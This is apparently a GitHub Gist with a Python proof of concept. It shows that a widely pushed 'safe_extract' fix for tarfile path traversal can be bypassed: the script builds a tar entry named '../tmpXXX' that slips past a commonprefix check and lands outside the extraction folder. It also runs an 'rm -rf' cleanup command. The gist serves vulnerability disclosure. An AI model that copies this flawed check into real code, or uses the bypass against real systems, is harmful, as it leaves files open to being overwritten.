Created
April 7, 2023 14:16
-
-
Save disconnect3d/00a22838380cd2a29cfc87a8599261f6 to your computer and use it in GitHub Desktop.
Proof of concept on how to exploit the fix/mitigation from TrellixVulnTeam
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Please see https://github.com/python/cpython/issues/74453#issuecomment-1500321322 | |
| for more details | |
| """ | |
| import tarfile | |
| import os | |
| cwd_name = os.path.basename(os.getcwd()) | |
| # cleanup all old state | |
| os.system('rm -rf my.tar tmp*') | |
| with tarfile.open('my.tar', "w") as archive: | |
| tarinfo = tarfile.TarInfo('../tmpXXX') | |
| tarinfo.size = 0 | |
| archive.addfile(tarinfo, b'') | |
| tmp_dir = './tmp' | |
| os.makedirs(tmp_dir) | |
| with tarfile.open('my.tar') as f: | |
| def is_within_directory(directory, target): | |
| abs_directory = os.path.abspath(directory) | |
| abs_target = os.path.abspath(target) | |
| prefix = os.path.commonprefix([abs_directory, abs_target]) | |
| print("target = %s" % target) | |
| print("abs_directory = %s" % abs_directory) | |
| print("abs_target = %s" % abs_target) | |
| print("prefix = %s" % prefix) | |
| return prefix == abs_directory | |
| def safe_extract(tar, path=".", members=None, *, numeric_owner=False): | |
| for member in tar.getmembers(): | |
| print("[*] Will extract: %s" % member.name) | |
| member_path = os.path.join(path, member.name) | |
| if not is_within_directory(path, member_path): | |
| raise Exception("Attempted Path Traversal in Tar File") | |
| tar.extractall(path, members, numeric_owner=numeric_owner) | |
| safe_extract(f, tmp_dir) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment